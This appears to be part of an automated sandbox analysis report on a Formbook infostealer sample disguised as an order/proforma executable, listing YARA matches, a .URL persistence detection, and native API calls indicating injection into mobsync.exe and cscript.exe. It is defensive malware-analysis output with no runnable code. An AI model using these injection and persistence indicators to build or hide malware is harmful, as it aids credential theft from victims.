Source: 0000000C.00000002.946259387.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.946259387.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000000.782971513.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000000.782971513.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.802925802.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.802925802.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.700532908.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.700532908.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.775386122.0000000000C50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.775386122.0000000000C50000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.700902769.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.700902769.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.775973432.0000000000D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.775973432.0000000000D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.804512443.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.804512443.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.701236114.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.701236114.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.796733965.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.796733965.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.752416776.000000000E234000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.752416776.000000000E234000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.946446675.0000000000BF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.946446675.0000000000BF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Contacts\Lxtcsmeg\gemsctxL.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_0361256A	0_3_0361256A
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_0360B500	0_3_0360B500
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Code function: 0_3_0360AAAE	0_3_0360AAAE
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5841F	5_2_04A5841F
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0D466	5_2_04B0D466
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A72581	5_2_04A72581
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5D5E0	5_2_04A5D5E0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B125DD	5_2_04B125DD
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A40D20	5_2_04A40D20
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B12D07	5_2_04B12D07
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B11D55	5_2_04B11D55
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B12EF7	5_2_04B12EF7
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A66E30	5_2_04A66E30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0D616	5_2_04B0D616
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B11FF1	5_2_04B11FF1
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B1DFCE	5_2_04B1DFCE
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A720A0	5_2_04A720A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B120A8	5_2_04B120A8
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A5B090	5_2_04A5B090
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B128EC	5_2_04B128EC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B1E824	5_2_04B1E824
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6A830	5_2_04A6A830
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B01002	5_2_04B01002
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A699BF	5_2_04A699BF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A64120	5_2_04A64120
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4F900	5_2_04A4F900
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B122AE	5_2_04B122AE
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AFFA2B	5_2_04AFFA2B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7EBB0	5_2_04A7EBB0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0DBD2	5_2_04B0DBD2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B003DA	5_2_04B003DA
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B12B28	5_2_04B12B28
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6AB40	5_2_04A6AB40
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_7249BA6A	5_2_7249BA6A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_7249C2A5	5_2_7249C2A5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_7249CB43	5_2_7249CB43
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_7249CBC0	5_2_7249CBC0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_72481030	5_2_72481030
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_7249CF61	5_2_7249CF61
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_7249CF64	5_2_7249CF64
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_72482FB0	5_2_72482FB0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_72488C7B	5_2_72488C7B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_72488C80	5_2_72488C80
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_72482D87	5_2_72482D87
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_72482D90	5_2_72482D90
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Code function: 9_3_0361256A	9_3_0361256A
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Code function: 9_3_0360B500	9_3_0360B500
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Code function: 9_3_0360AAAE	9_3_0360AAAE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4496	12_2_048E4496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0483841F	12_2_0483841F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048ED466	12_2_048ED466
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04852581	12_2_04852581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E2D82	12_2_048E2D82
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F25DD	12_2_048F25DD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0483D5E0	12_2_0483D5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F2D07	12_2_048F2D07
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04820D20	12_2_04820D20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F1D55	12_2_048F1D55
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F2EF7	12_2_048F2EF7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048ED616	12_2_048ED616
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04846E30	12_2_04846E30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048FDFCE	12_2_048FDFCE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F1FF1	12_2_048F1FF1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0483B090	12_2_0483B090
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048520A0	12_2_048520A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F20A8	12_2_048F20A8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F28EC	12_2_048F28EC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1002	12_2_048E1002
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048FE824	12_2_048FE824
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484A830	12_2_0484A830
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048499BF	12_2_048499BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0482F900	12_2_0482F900
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04844120	12_2_04844120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F22AE	12_2_048F22AE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4AEF	12_2_048E4AEF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048DFA2B	12_2_048DFA2B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485EBB0	12_2_0485EBB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E03DA	12_2_048E03DA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048EDBD2	12_2_048EDBD2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485ABD8	12_2_0485ABD8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048D23E3	12_2_048D23E3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484A309	12_2_0484A309
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F2B28	12_2_048F2B28
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484AB40	12_2_0484AB40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003EBA6A	12_2_003EBA6A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003EC2A5	12_2_003EC2A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003ECB43	12_2_003ECB43
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003ECBC0	12_2_003ECBC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003D8C7B	12_2_003D8C7B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003D8C80	12_2_003D8C80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003D2D90	12_2_003D2D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003D2D87	12_2_003D2D87
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003ECF64	12_2_003ECF64
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003ECF61	12_2_003ECF61
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003D2FB0	12_2_003D2FB0

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 04A4B150 appears 72 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0482B150 appears 133 times

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A895D0 NtClose,LdrInitializeThunk,	5_2_04A895D0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89540 NtReadFile,LdrInitializeThunk,	5_2_04A89540
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A896E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_04A896E0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A897A0 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_04A897A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89780 NtMapViewOfSection,LdrInitializeThunk,	5_2_04A89780
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89FE0 NtCreateMutant,LdrInitializeThunk,	5_2_04A89FE0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89710 NtQueryInformationToken,LdrInitializeThunk,	5_2_04A89710
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_04A89860
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89840 NtDelayExecution,LdrInitializeThunk,	5_2_04A89840
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A899A0 NtCreateSection,LdrInitializeThunk,	5_2_04A899A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_04A89910
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89A20 NtResumeThread,LdrInitializeThunk,	5_2_04A89A20
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89A50 NtCreateFile,LdrInitializeThunk,	5_2_04A89A50
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A895F0 NtQueryInformationFile,	5_2_04A895F0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89520 NtWaitForSingleObject,	5_2_04A89520
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A8AD30 NtSetContextThread,	5_2_04A8AD30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89560 NtWriteFile,	5_2_04A89560
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A896D0 NtCreateKey,	5_2_04A896D0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89610 NtEnumerateValueKey,	5_2_04A89610
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89660 NtAllocateVirtualMemory,	5_2_04A89660
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89670 NtQueryInformationProcess,	5_2_04A89670
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89650 NtQueryValueKey,	5_2_04A89650
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89730 NtQueryVirtualMemory,	5_2_04A89730
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A8A710 NtOpenProcessToken,	5_2_04A8A710
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89760 NtOpenProcess,	5_2_04A89760
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A8A770 NtOpenThread,	5_2_04A8A770
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89770 NtSetInformationFile,	5_2_04A89770
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A898A0 NtWriteVirtualMemory,	5_2_04A898A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A898F0 NtReadVirtualMemory,	5_2_04A898F0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89820 NtEnumerateKey,	5_2_04A89820
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A8B040 NtSuspendThread,	5_2_04A8B040
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A899D0 NtCreateProcessEx,	5_2_04A899D0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89950 NtQueueApcThread,	5_2_04A89950
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89A80 NtOpenDirectoryObject,	5_2_04A89A80
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89A00 NtProtectVirtualMemory,	5_2_04A89A00
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89A10 NtQuerySection,	5_2_04A89A10
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A8A3B0 NtGetContextThread,	5_2_04A8A3B0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A89B00 NtSetValueKey,	5_2_04A89B00
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_72498690 NtReadFile,	5_2_72498690
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_72498710 NtClose,	5_2_72498710
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_724985E0 NtCreateFile,	5_2_724985E0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_72498632 NtCreateFile,	5_2_72498632
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_7249868A NtReadFile,	5_2_7249868A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_7249870A NtClose,	5_2_7249870A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048695D0 NtClose,LdrInitializeThunk,	12_2_048695D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869540 NtReadFile,LdrInitializeThunk,	12_2_04869540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048696D0 NtCreateKey,LdrInitializeThunk,	12_2_048696D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048696E0 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_048696E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869650 NtQueryValueKey,LdrInitializeThunk,	12_2_04869650
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869660 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_04869660
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869780 NtMapViewOfSection,LdrInitializeThunk,	12_2_04869780
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869FE0 NtCreateMutant,LdrInitializeThunk,	12_2_04869FE0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869710 NtQueryInformationToken,LdrInitializeThunk,	12_2_04869710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869840 NtDelayExecution,LdrInitializeThunk,	12_2_04869840
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869860 NtQuerySystemInformation,LdrInitializeThunk,	12_2_04869860
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048699A0 NtCreateSection,LdrInitializeThunk,	12_2_048699A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869910 NtAdjustPrivilegesToken,LdrInitializeThunk,	12_2_04869910
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869A50 NtCreateFile,LdrInitializeThunk,	12_2_04869A50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048695F0 NtQueryInformationFile,	12_2_048695F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869520 NtWaitForSingleObject,	12_2_04869520
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0486AD30 NtSetContextThread,	12_2_0486AD30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869560 NtWriteFile,	12_2_04869560
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869610 NtEnumerateValueKey,	12_2_04869610
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869670 NtQueryInformationProcess,	12_2_04869670
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048697A0 NtUnmapViewOfSection,	12_2_048697A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0486A710 NtOpenProcessToken,	12_2_0486A710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869730 NtQueryVirtualMemory,	12_2_04869730
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869760 NtOpenProcess,	12_2_04869760
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0486A770 NtOpenThread,	12_2_0486A770
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869770 NtSetInformationFile,	12_2_04869770
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048698A0 NtWriteVirtualMemory,	12_2_048698A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048698F0 NtReadVirtualMemory,	12_2_048698F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869820 NtEnumerateKey,	12_2_04869820
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0486B040 NtSuspendThread,	12_2_0486B040
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048699D0 NtCreateProcessEx,	12_2_048699D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869950 NtQueueApcThread,	12_2_04869950
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869A80 NtOpenDirectoryObject,	12_2_04869A80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869A00 NtProtectVirtualMemory,	12_2_04869A00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869A10 NtQuerySection,	12_2_04869A10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869A20 NtResumeThread,	12_2_04869A20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0486A3B0 NtGetContextThread,	12_2_0486A3B0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04869B00 NtSetValueKey,	12_2_04869B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003E85E0 NtCreateFile,	12_2_003E85E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003E8690 NtReadFile,	12_2_003E8690
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003E8710 NtClose,	12_2_003E8710
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003E87C0 NtAllocateVirtualMemory,	12_2_003E87C0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003E8632 NtCreateFile,	12_2_003E8632
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003E868A NtReadFile,	12_2_003E868A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_003E870A NtClose,	12_2_003E870A
